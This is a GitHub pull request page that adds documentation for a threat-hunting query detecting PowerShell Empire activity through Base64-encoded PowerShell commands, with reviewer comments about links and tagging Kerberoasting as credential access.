-
Notifications
You must be signed in to change notification settings - Fork 511
PowerShell Empire related pages #203
base: master
Are you sure you want to change the base?
Conversation
|
||
[PowerShell Empire](https://www.powershellempire.com/) is a modular toolkit used both by penetration testers and malicious actors. It offers a wide range of attack techniques, and has been observed in numerous attacks. | ||
|
||
The following query detects Base64-encoded PowerShell commands that are either process creation or network events. This can identify common techniques, such as [Kerberoasting](https://docs.microsoft.com/azure-advanced-threat-protection/atp-reconnaissance-alerts#security-principal-reconnaissance-ldap-external-id-2038). |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@martyav @endisphotic, should we point this to:
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I updated this with the latest commit (dd4e530)
| Persistence | | | | ||
| Privilege escalation | | | | ||
| Defense evasion | v | | | ||
| Credential Access | | | |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@martyav @endisphotic Credential access for Kerberoasting?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Added in the latest commit (dd4e530)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please see comments.
Part of a series of pull requests, placing queries from the TA reports in the repo.
Some of the column names may be outdated, as some of the reports are quite old.
Others in the series:
#145, #155, #163, #165,
#168, #169, #170, #172,
#173 , #174, #175, #177,
#178, #182, #183, #190,
#191, #192, #195, #196
#198, #202